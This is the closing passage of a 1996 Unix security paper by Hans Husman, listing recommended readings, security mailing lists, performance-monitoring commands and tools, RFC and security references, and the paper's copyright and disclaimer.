- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.

- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.

.F.1.9. READ SOMETHING BIGGER AND BETTER
----------------------------------------

Let's start with papers on the Internet. I am sorry to say that it is not
very many good free papers that can be found, but here is a small collection
and I am sorry if have have over looked a paper.

(1) The Rainbow books is a long series of free books on computer security.
US citizens can get the books from:

INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600

We other just have to read the papers on the World Wide Web. Every
paper can not however be found on the Internet.

(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't now anything about
computer security you can't find a better start.

(3) "The WWW security FAQ" by Stein is although it deal with W3-security
the very best better on the Internet about computer security.

(4) CERT have aklso published several good papers, for example:

- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.

I think however that the last paper have overlooked several things.

(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".

(6) Also see section ".G. SUGGESTED READING"

You should also get some big good commercial book, but I don't want
to recommend any.

.F.2. MONITORING PERFORMANCE
----------------------------

.F.2.1. INTRODUCTION
--------------------

There is several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on Internet.

.F.2.2. COMMANDS AND SERVICES
-----------------------------

For more information read the man text.

netstat Show network status.
nfsstat Show NFS statistics.
sar System activity reporter.
vmstat Report virtual memory statistics.
timex Time a command, report process data and system
activity.
time Time a simple command.
truss Trace system calls and signals.
uptime Show how long the system has been up.

Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.

.F.2.3. PROGRAMS
----------------

Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/

Top: Top might be a more simple program than Proctool, but is
good enough.

.F.2.4. ACCOUNTING
------------------

To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time, memory each program uses. You should
check your manual to see how to set this up.

You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:

- netstat
- iostat -D
- vmstat

.G. SUGGESTED READING
~~~~~~~~~~~~~~~~~~~~~

.F.1. INFORMATION FOR DEEPER KNOWLEDGE
-------------------------------------

(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.

Many of the papers in this category was RFC-papers. A RFC-paper
is a paper that describes a protocol. The letters RCS stands for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
it is always good to read the proper RFC. You can find a nice sRFC
index search form at URL:

http://pubweb.nexor.co.uk/public/rfc/index/rfc.html

.F.2. KEEPING UP TO DATE INFORMATION
------------------------------------

(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varius 40Hex Issues.

.F.3. BASIC INFORMATION
-----------------------

(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books: - Teal Green Book (Glossary of
Computer Security Terms).
- Bright Orange Book( A Guide
to Understanding Security Testing
and Test Documentation in Trusted
Systems).
- C1 Technical Report-001
(Computer Viruses: Preventation,
Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.

.H. COPYRIHT
------------

This paper is Copyright (c) 1996 by Hans Husman.

Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.

.I. DISCLAIMER
--------------

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.